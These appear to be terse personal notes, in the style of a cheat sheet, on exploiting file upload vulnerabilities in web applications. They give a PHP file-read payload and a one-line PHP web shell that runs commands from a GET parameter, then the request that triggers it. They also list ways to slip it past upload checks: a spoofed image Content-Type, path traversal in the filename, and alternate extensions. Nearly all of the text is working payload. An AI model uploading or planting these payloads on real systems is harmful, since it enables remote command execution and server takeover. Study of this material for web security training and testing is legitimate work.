<?php echo file_get_contents('/path/to/target/file'); ?>
then read the file with GET
or
<?php echo system($_GET['command']); ?> → GOAT
then
GET /example/exploit.php?command=id HTTP/1.1
in the request change the content type
`Content-Type: image/jpeg`
sometimes you can upload to a directory other than the intended one by changing the filename
Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
filename="..%2fexploit.php"
then after do
GET /files/avatars/..%2fexploit.php or GET /files/exploit.php
try to bypass with .php5, .shtml